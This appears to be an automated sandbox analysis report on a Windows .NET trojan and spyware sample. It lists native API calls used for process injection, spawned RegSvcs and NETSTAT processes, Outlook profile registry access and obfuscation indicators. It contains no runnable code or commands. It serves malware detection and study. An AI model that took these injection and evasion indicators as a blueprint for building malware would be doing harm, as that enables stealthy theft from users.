Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BD616 1_2_013BD616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C2EF7 1_2_013C2EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004012A4 1_2_004012A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00409ACC 1_2_00409ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0040B467 1_2_0040B467
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004044C7 1_2_004044C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0042257F 1_2_0042257F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004046E7 1_2_004046E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0040FE97 1_2_0040FE97
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BAB40 10_2_035BAB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03662B28 10_2_03662B28
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035CABD8 10_2_035CABD8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0365DBD2 10_2_0365DBD2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_036503DA 10_2_036503DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035CEBB0 10_2_035CEBB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0364FA2B 10_2_0364FA2B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_036622AE 10_2_036622AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0359F900 10_2_0359F900
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035B4120 10_2_035B4120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035B99BF 10_2_035B99BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0366E824 10_2_0366E824
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03651002 10_2_03651002
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA830 10_2_035BA830
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_036628EC 10_2_036628EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035AB090 10_2_035AB090
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_036620A8 10_2_036620A8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C20A0 10_2_035C20A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03661FF1 10_2_03661FF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0366DFCE 10_2_0366DFCE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035B6E30 10_2_035B6E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0365D616 10_2_0365D616
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03662EF7 10_2_03662EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03661D55 10_2_03661D55
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03662D07 10_2_03662D07
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03590D20 10_2_03590D20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035AD5E0 10_2_035AD5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_036625DD 10_2_036625DD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C2581 10_2_035C2581
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0365D466 10_2_0365D466
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035A841F 10_2_035A841F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BC88B0 10_2_00BC88B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BCE760 10_2_00BCE760
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BC2D90 10_2_00BC2D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BC9D30 10_2_00BC9D30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BE0E48 10_2_00BE0E48
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BC2FB0 10_2_00BC2FB0
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 012FB150 appears 136 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0359B150 appears 87 times
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_01339910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013399A0 NtCreateSection,LdrInitializeThunk, 1_2_013399A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339860 NtQuerySystemInformation,LdrInitializeThunk, 1_2_01339860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339840 NtDelayExecution,LdrInitializeThunk, 1_2_01339840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013398F0 NtReadVirtualMemory,LdrInitializeThunk, 1_2_013398F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339A20 NtResumeThread,LdrInitializeThunk, 1_2_01339A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339A00 NtProtectVirtualMemory,LdrInitializeThunk, 1_2_01339A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339A50 NtCreateFile,LdrInitializeThunk, 1_2_01339A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339540 NtReadFile,LdrInitializeThunk, 1_2_01339540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013395D0 NtClose,LdrInitializeThunk, 1_2_013395D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339710 NtQueryInformationToken,LdrInitializeThunk, 1_2_01339710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013397A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_013397A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339780 NtMapViewOfSection,LdrInitializeThunk, 1_2_01339780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339FE0 NtCreateMutant,LdrInitializeThunk, 1_2_01339FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339660 NtAllocateVirtualMemory,LdrInitializeThunk, 1_2_01339660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013396E0 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_013396E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339950 NtQueueApcThread, 1_2_01339950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013399D0 NtCreateProcessEx, 1_2_013399D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339820 NtEnumerateKey, 1_2_01339820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0133B040 NtSuspendThread, 1_2_0133B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013398A0 NtWriteVirtualMemory, 1_2_013398A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339B00 NtSetValueKey, 1_2_01339B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0133A3B0 NtGetContextThread, 1_2_0133A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339A10 NtQuerySection, 1_2_01339A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339A80 NtOpenDirectoryObject, 1_2_01339A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0133AD30 NtSetContextThread, 1_2_0133AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339520 NtWaitForSingleObject, 1_2_01339520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339560 NtWriteFile, 1_2_01339560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013395F0 NtQueryInformationFile, 1_2_013395F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339730 NtQueryVirtualMemory, 1_2_01339730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0133A710 NtOpenProcessToken, 1_2_0133A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0133A770 NtOpenThread, 1_2_0133A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339770 NtSetInformationFile, 1_2_01339770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339760 NtOpenProcess, 1_2_01339760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339610 NtEnumerateValueKey, 1_2_01339610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339670 NtQueryInformationProcess, 1_2_01339670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339650 NtQueryValueKey, 1_2_01339650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013396D0 NtCreateKey, 1_2_013396D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041E087 NtAllocateVirtualMemory, 1_2_0041E087
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004012A4 NtProtectVirtualMemory, 1_2_004012A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041DEA7 NtCreateFile, 1_2_0041DEA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041DF57 NtReadFile, 1_2_0041DF57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041DFD7 NtClose, 1_2_0041DFD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041E083 NtAllocateVirtualMemory, 1_2_0041E083
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004014E9 NtProtectVirtualMemory, 1_2_004014E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041DEA1 NtCreateFile, 1_2_0041DEA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041DFD1 NtClose, 1_2_0041DFD1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9A50 NtCreateFile,LdrInitializeThunk, 10_2_035D9A50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 10_2_035D9910
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D99A0 NtCreateSection,LdrInitializeThunk, 10_2_035D99A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9840 NtDelayExecution,LdrInitializeThunk, 10_2_035D9840
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9860 NtQuerySystemInformation,LdrInitializeThunk, 10_2_035D9860
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9710 NtQueryInformationToken,LdrInitializeThunk, 10_2_035D9710
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9FE0 NtCreateMutant,LdrInitializeThunk, 10_2_035D9FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9780 NtMapViewOfSection,LdrInitializeThunk, 10_2_035D9780
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9650 NtQueryValueKey,LdrInitializeThunk, 10_2_035D9650
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9660 NtAllocateVirtualMemory,LdrInitializeThunk, 10_2_035D9660
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9610 NtEnumerateValueKey,LdrInitializeThunk, 10_2_035D9610
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D96D0 NtCreateKey,LdrInitializeThunk, 10_2_035D96D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D96E0 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_035D96E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9540 NtReadFile,LdrInitializeThunk, 10_2_035D9540
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9560 NtWriteFile,LdrInitializeThunk, 10_2_035D9560
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D95D0 NtClose,LdrInitializeThunk, 10_2_035D95D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9B00 NtSetValueKey, 10_2_035D9B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035DA3B0 NtGetContextThread, 10_2_035DA3B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9A10 NtQuerySection, 10_2_035D9A10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9A00 NtProtectVirtualMemory, 10_2_035D9A00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9A20 NtResumeThread, 10_2_035D9A20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9A80 NtOpenDirectoryObject, 10_2_035D9A80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9950 NtQueueApcThread, 10_2_035D9950
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D99D0 NtCreateProcessEx, 10_2_035D99D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035DB040 NtSuspendThread, 10_2_035DB040
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9820 NtEnumerateKey, 10_2_035D9820
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D98F0 NtReadVirtualMemory, 10_2_035D98F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D98A0 NtWriteVirtualMemory, 10_2_035D98A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035DA770 NtOpenThread, 10_2_035DA770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9770 NtSetInformationFile, 10_2_035D9770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9760 NtOpenProcess, 10_2_035D9760
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035DA710 NtOpenProcessToken, 10_2_035DA710
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9730 NtQueryVirtualMemory, 10_2_035D9730
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D97A0 NtUnmapViewOfSection, 10_2_035D97A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9670 NtQueryInformationProcess, 10_2_035D9670
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035DAD30 NtSetContextThread, 10_2_035DAD30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D9520 NtWaitForSingleObject, 10_2_035D9520
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D95F0 NtQueryInformationFile, 10_2_035D95F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDC8A0 NtClose, 10_2_00BDC8A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDC820 NtReadFile, 10_2_00BDC820
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDC870 NtDeleteFile, 10_2_00BDC870
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDC950 NtAllocateVirtualMemory, 10_2_00BDC950
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDC770 NtCreateFile, 10_2_00BDC770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDC89A NtClose, 10_2_00BDC89A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDC8CA NtDeleteFile, 10_2_00BDC8CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDC94C NtAllocateVirtualMemory, 10_2_00BDC94C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDC76A NtCreateFile, 10_2_00BDC76A
PE file does not import any functions
Source: NHYGUnNN.exe Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: NHYGUnNN.exe, 00000000.00000002.237146160.0000012A25D66000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHMMCXNXCJKFD.exe: vs NHYGUnNN.exe
Source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBUMBUM.dll. vs NHYGUnNN.exe
Source: NHYGUnNN.exe, 00000000.00000002.237199303.0000012A25EE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs NHYGUnNN.exe
Source: NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameBUMBUM.dll. vs NHYGUnNN.exe
Source: NHYGUnNN.exe Binary or memory string: OriginalFilenameHMMCXNXCJKFD.exe: vs NHYGUnNN.exe
Source: NHYGUnNN.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: NHYGUnNN.exe ReversingLabs: Detection: 27%
Source: NHYGUnNN.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\NHYGUnNN.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\NHYGUnNN.exe C:\Users\user\Desktop\NHYGUnNN.exe
Source: C:\Users\user\Desktop\NHYGUnNN.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Users\user\Desktop\NHYGUnNN.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\NHYGUnNN.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NHYGUnNN.exe.log Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE File created: C:\Users\user\AppData\Local\Temp\1--Lt08NN Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/2@6/6
Source: NHYGUnNN.exe Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
Source: C:\Users\user\Desktop\NHYGUnNN.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: NHYGUnNN.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: NHYGUnNN.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: NHYGUnNN.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdb source: NHYGUnNN.exe
Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdb source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdbBSJB source: NHYGUnNN.exe
Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdbBSJB source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: NHYGUnNN.exe, A/cb0864eb24eeeb94488d89ba2673ea289.cs .Net Code: c7f594fa444d3738d4ed4d33557eff5b6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.NHYGUnNN.exe.12a25d20000.0.unpack, A/cb0864eb24eeeb94488d89ba2673ea289.cs .Net Code: c7f594fa444d3738d4ed4d33557eff5b6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.NHYGUnNN.exe.12a25d20000.0.unpack, A/cb0864eb24eeeb94488d89ba2673ea289.cs .Net Code: c7f594fa444d3738d4ed4d33557eff5b6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\NHYGUnNN.exe Code function: 0_2_0000012A25D250CF push rdx; ret 0_2_0000012A25D250D5
Source: C:\Users\user\Desktop\NHYGUnNN.exe Code function: 0_2_00007FFCA43F417B push edx; ret 0_2_00007FFCA43F417C
Source: C:\Users\user\Desktop\NHYGUnNN.exe Code function: 0_2_00007FFCA43F4185 push edx; ret 0_2_00007FFCA43F4186
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0134D0D1 push ecx; ret 1_2_0134D0E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004210E9 push eax; ret 1_2_004210EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004210F2 push eax; ret 1_2_00421159
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0042109C push eax; ret 1_2_004210EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00421153 push eax; ret 1_2_00421159
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041E901 push ebp; ret 1_2_0041E902
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00405A1E push ecx; ret 1_2_004059E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004172D0 push edx; retf 1_2_004172D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0040A2E4 push ecx; iretd 1_2_0040A2E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00409B74 push ecx; retf 1_2_00409B7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00408BAF push cx; ret 1_2_00408C27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00409CB7 push cs; retf 1_2_00409CCF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041A528 push ebp; ret 1_2_0041A532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004085F9 pushfd ; iretd 1_2_00408601
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0040CF66 push cs; ret 1_2_0040CF69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041AFA7 push ecx; ret 1_2_0041AFA8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035ED0D1 push ecx; ret 10_2_035ED0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BCB82F push cs; ret 10_2_00BCB832
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BD9870 push ecx; ret 10_2_00BD9871
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDF9BB push eax; ret 10_2_00BDFA22
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDF9B2 push eax; ret 10_2_00BDF9B8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDD1CA push ebp; ret 10_2_00BDD1CB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDF965 push eax; ret 10_2_00BDF9B8
